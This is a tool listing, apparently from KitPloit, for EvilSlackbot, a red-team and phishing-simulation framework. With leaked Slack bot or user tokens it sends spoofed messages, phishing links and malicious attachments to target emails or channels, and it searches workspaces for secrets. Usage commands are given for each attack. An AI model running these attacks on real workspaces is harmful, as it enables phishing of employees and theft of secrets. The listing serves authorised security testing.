Lucene search

KitPloitKITPLOIT:2239872110161089631

HistoryJun 02, 2024 - 12:30 p.m.

EvilSlackbot - A Slack Bot Phishing Framework For Red Teaming Exercises

2024-06-0212:30:00

www.kitploit.com

red team

phishing

slack

framework

security

permissions

oauth token

python3

slackclient

spoof

messages

files

secrets

emails

installation

usage

7 High

AI Score

Confidence

Low

JSON

EvilSlackbot

A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.

Disclaimer

This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.

Background

Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb orxoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. NowEvilSlackbotis here to automate and streamline that process.You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.

Phishing Simulations

In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To useEvilSlackbotto conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provideEvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)

Installation

EvilSlackbot requires python3 and Slackclient

pip3 install slackclient

Usage

usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]  
                       [-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]  
  
options:  
  -h, --help            show this help message and exit  
  
Required:  
  -t TOKEN, --token TOKEN  
                        Slack Oauth token  
  
Attacks:  
  -sP, --spoof          Spoof a Slack message, customizing your name, icon, etc  
                        (Requires -e,-eL, or -cH)  
  -m, --message         Send a message as the bot associated with your token  
                        (Requires -e,-eL, or -cH)  
  -s, --search          Search slack for secrets with a keyword  
  -a, --attach          Send a message containing a malicious attachment (Requires -f  
                        and -e,-eL, or -cH)  
  
Arguments:  
  -f FILE, --file FILE  Path to file attachment  
  -e EMAIL, --email EMAIL  
                        Email of target  
  -cH    CHANNEL, --channel CHANNEL  
                        Target Slack Channel (Do not include #)  
  -eL EMAIL_LIST, --email_list EMAIL_LIST  
                        Path to list of emails separated by newline  
  -c, --check           Lookup and display the permissions and available attacks  
                        associated with your provided token.  
  -o OUTFILE, --outfile OUTFILE  
                        Outfile to store search results  
  -cL, --channel_list   List all public Slack channels

Token

To use this tool, you must provide a xoxb or xoxp token.

Required:  
  -t TOKEN, --token TOKEN  (Slack xoxb/xoxp token)  



python3 EvilSlackbot.py -t &lt;token&gt;

Attacks

Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct.EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.

Attacks:  
  -sP, --spoof   Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)  
  
  -m, --message  Send a message as the bot associated with your token (Requires -e,-eL, or -cH)  
  
  -s, --search   Search slack for secrets with a keyword   
  
  -a, --attach   Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)

Spoofed messages (-sP)

With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either theemail address (-e)of the target, alist of target emails (-eL), or the name of aSlack channel (-cH).EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t &lt;xoxb token&gt; -sP -e &lt;email address&gt;  
  
python3 EvilSlackbot.py -t &lt;xoxb token&gt; -sP -eL &lt;email list&gt;  
  
python3 EvilSlackbot.py -t &lt;xoxb token&gt; -sP -cH &lt;Channel name&gt;

Phishing Messages (-m)

With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either theemail address (-e)of the target, alist of target emails (-eL), or the name of aSlack channel (-cH).EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t &lt;xoxb token&gt; -m -e &lt;email address&gt;  
  
python3 EvilSlackbot.py -t &lt;xoxb token&gt; -m -eL &lt;email list&gt;  
  
python3 EvilSlackbot.py -t &lt;xoxb token&gt; -m -cH &lt;Channel name&gt;

Secret Search (-s)

With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.

python3 EvilSlackbot.py -t &lt;xoxp token&gt; -s -o &lt;outfile.txt&gt;

Attachments (-a)

With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires apath to the file (-f)you wish to send. This attack also requires either theemail address (-e)of the target, alist of target emails (-eL), or the name of aSlack channel (-cH).EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.

python3 EvilSlackbot.py -t &lt;xoxb token&gt; -a -f &lt;path to file&gt; -e &lt;email address&gt;  
  
python3 EvilSlackbot.py -t &lt;xoxb token&gt; -a -f &lt;path to file&gt; -eL &lt;email list&gt;  
  
python3 EvilSlackbot.py -t &lt;xoxb token&gt; -a -f &lt;path to file&gt; -cH &lt;Channel name&gt;

Arguments

Arguments:  
  -f FILE, --file FILE  Path to file attachment  
  -e EMAIL, --email EMAIL  Email of target  
  -cH CHANNEL, --channel CHANNEL  Target Slack Channel (Do not include #)  
  -eL EMAIL_LIST, --email_list EMAIL_LIST  Path to list of emails separated by newline  
  -c, --check   Lookup and display the permissions and available attacks associated with your provided token.  
  -o OUTFILE, --outfile OUTFILE Outfile to store search results  
  -cL, --channel_list   List all public Slack channels

Channel Search

With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.

python3 EvilSlackbot.py -t &lt;xoxb token&gt; -cL

Download EvilSlackbot

References

github.com/Drew-Sec/EvilSlackbot

7 High

AI Score

Confidence

Low

JSON